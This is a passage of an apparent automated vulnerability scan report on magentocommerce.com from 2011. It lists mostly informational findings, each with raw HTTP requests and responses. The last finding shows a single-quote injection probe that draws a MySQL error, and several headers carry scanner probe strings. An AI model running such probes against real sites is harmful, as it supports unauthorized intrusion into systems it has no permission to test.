Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:24:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187366; expires=Sat, 11-Aug-2012 18:16:06 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:16:07 GMT
Content-Length: 78623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

7. Cross-domain POST  previous  next
There are 3 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


7.1. http://www.magentocommerce.com/boards/viewannounce/228974_11106/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /boards/viewannounce/228974_11106/ HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:18:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utma=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmb=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmc=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp___utmz=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp__mkto_trk=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=deleted; expires=Thu, 12-Aug-2010 18:18:47 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:27:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187528; expires=Sat, 11-Aug-2012 18:18:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A34%3A%22%2Fboards%2Fviewannounce%2F228974_11106%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:18:48 GMT
Content-Length: 40161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...

7.2. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The page contains a form which POSTs data to the domain www.feedburner.com. The form contains the following fields:

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:24:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187366; expires=Sat, 11-Aug-2012 18:16:06 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:16:07 GMT
Content-Length: 78623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div id="emailNewsletter" style="margin-bottom:10px;visibility:hidden;height:1px;">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=828202', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset style="margin-bottom:15px; padding:10px; background:url(http://www.magentocommerce.com/images/uploads/bg_feedburner_email.gif) repeat-x 0 100% #dcebf6; border:1px solid #adcfde;">
...[SNIP]...

7.3. http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_PHPSESSID=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_guid=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=deleted; expires=Thu, 12-Aug-2010 18:16:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_domain=c; expires=Sun, 12-Aug-2012 04:24:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313187366; expires=Sat, 11-Aug-2012 18:16:06 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 18:16:07 GMT
Content-Length: 78623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...

8. Email addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /js/forum.js

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /js/forum.js HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: */*
Referer: http://www.magentocommerce.com/magento-connect/symmetrics+GmbH/extension/1764/market-ready-germany/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: guid=c0e15fadf535fc0a598d5ed7c92a8ee1; PHPSESSID=up531bh8q4bg8ej1s63akis2o0; exp_domain=magentocommerce.com; exp_last_activity=1313187365; exp_last_visit=997827365
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:07 GMT
Content-Type: application/x-javascript
Last-Modified: Mon, 21 Feb 2011 10:53:26 GMT
Connection: close
Expires: Fri, 19 Aug 2011 18:16:07 GMT
Cache-Control: max-age=604800
Content-Length: 38320

function navHover(which)
{                    
   if (document.getElementById(which.id))
   {
       cur = document.getElementById(which.id).className;
       
       if (cur == 'buttonLarge')
       {
           document.getElementById(wh
...[SNIP]...
<matt@mattkruse.com>
...[SNIP]...

9. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /proxy/proxy.php/x.js

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.magentocommerce.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:16:08 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 10 Jun 2011 17:04:14 GMT
ETag: "d88850-13d-4a55e8f263f80"
Accept-Ranges: bytes
Content-Length: 317

User-agent: *
#Disallow: /
Disallow: /member/
Disallow: /ignore_member/
Disallow: /rss_2.0/
Disallow: /new_topic_search/
Disallow: /view_pending_topics/
Disallow: /member_search/
Disallow: /boards/sea
...[SNIP]...

10. HTML does not specify charset  previous  next
There are 4 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


10.1. http://www.magentocommerce.com/img/btn_submit.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /img/btn_submit.gif

Request

GET /img/btn_submit.gif HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/lt/comments/magento-palyginta-su-aspnet-el-parduotuvemis//%22ns%3D%22netsparker%280x0088A2%29)
Cookie: __utma=94789760.1662188125.1313161373.1313161373.1313161373.1; __utmz=94789760.1313161373.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313161374101-89036; guid=e835a9ce977f37d2351e667233649d7a; homepage_intro=1; exp_domain=c; exp_last_activity=1313188109; exp_last_visit=997816111; __switchTo5x=58; __unam=28e3065-131be8b2931-29750417-1; PHPSESSID=rffphmccmmc1vmaobjenl1i6t6

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:28:35 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 169

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

10.2. http://www.magentocommerce.com/img/btn_submit_comment_blue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /img/btn_submit_comment_blue.gif

Request

GET /img/btn_submit_comment_blue.gif HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/lt/comments/magento-palyginta-su-aspnet-el-parduotuvemis//%22ns%3D%22netsparker%280x0088A2%29)
Cookie: __utma=94789760.1662188125.1313161373.1313161373.1313161373.1; __utmz=94789760.1313161373.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313161374101-89036; guid=e835a9ce977f37d2351e667233649d7a; homepage_intro=1; exp_domain=c; exp_last_activity=1313188109; exp_last_visit=997816111; __switchTo5x=58; __unam=28e3065-131be8b2931-29750417-1; PHPSESSID=rffphmccmmc1vmaobjenl1i6t6

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:28:38 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 169

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

10.3. http://www.magentocommerce.com/img/icon_post_comment.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /img/icon_post_comment.gif

Request

GET /img/icon_post_comment.gif HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/css/boxes.css?v=14
Cookie: __utma=94789760.1662188125.1313161373.1313161373.1313161373.1; __utmz=94789760.1313161373.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313161374101-89036; guid=e835a9ce977f37d2351e667233649d7a; homepage_intro=1; exp_domain=c; exp_last_activity=1313188109; exp_last_visit=997816111; __switchTo5x=58; __unam=28e3065-131be8b2931-29750417-1; PHPSESSID=rffphmccmmc1vmaobjenl1i6t6

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:28:37 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 169

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

10.4. http://www.magentocommerce.com/img/magento_dnld_rr.gif  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /img/magento_dnld_rr.gif

Request

GET /img/magento_dnld_rr.gif HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/lt/comments/magento-palyginta-su-aspnet-el-parduotuvemis//%22ns%3D%22netsparker%280x0088A2%29)
Cookie: __utma=94789760.1662188125.1313161373.1313161373.1313161373.1; __utmz=94789760.1313161373.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313161374101-89036; guid=e835a9ce977f37d2351e667233649d7a; homepage_intro=1; exp_domain=c; exp_last_activity=1313188109; exp_last_visit=997816111; __switchTo5x=58; __unam=28e3065-131be8b2931-29750417-1; PHPSESSID=rffphmccmmc1vmaobjenl1i6t6

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:28:32 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 169

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

11. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.magentocommerce.com
Path:   /boards/viewannounce/228974_11106%27/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /boards/viewannounce/228974_11106%27/ HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/0
Cookie: __utma=94789760.1662188125.1313161373.1313161373.1313173765.2; __utmz=94789760.1313173765.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313161374101-89036; guid=e835a9ce977f37d2351e667233649d7a; homepage_intro=1; __switchTo5x=58; __unam=28e3065-131be8b2931-29750417-1; __utmb=94789760.2.10.1313173765; exp_domain=c; exp_last_activity=1313188810; exp_last_visit=997828810; PHPSESSID=rffphmccmmc1vmaobjenl1i6t6; __utmc=94789760

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 18:52:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313189577; expires=Sat, 11-Aug-2012 18:52:57 GMT; path=/; domain=magentocommerce.com
Content-Length: 645

MySQL ERROR:<br /><br />Error Number: 1064<br /><br />Description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near
...[SNIP]...

Report generated by XSS.CX at Fri Aug 12 12:58:24 GMT-06:00 2011.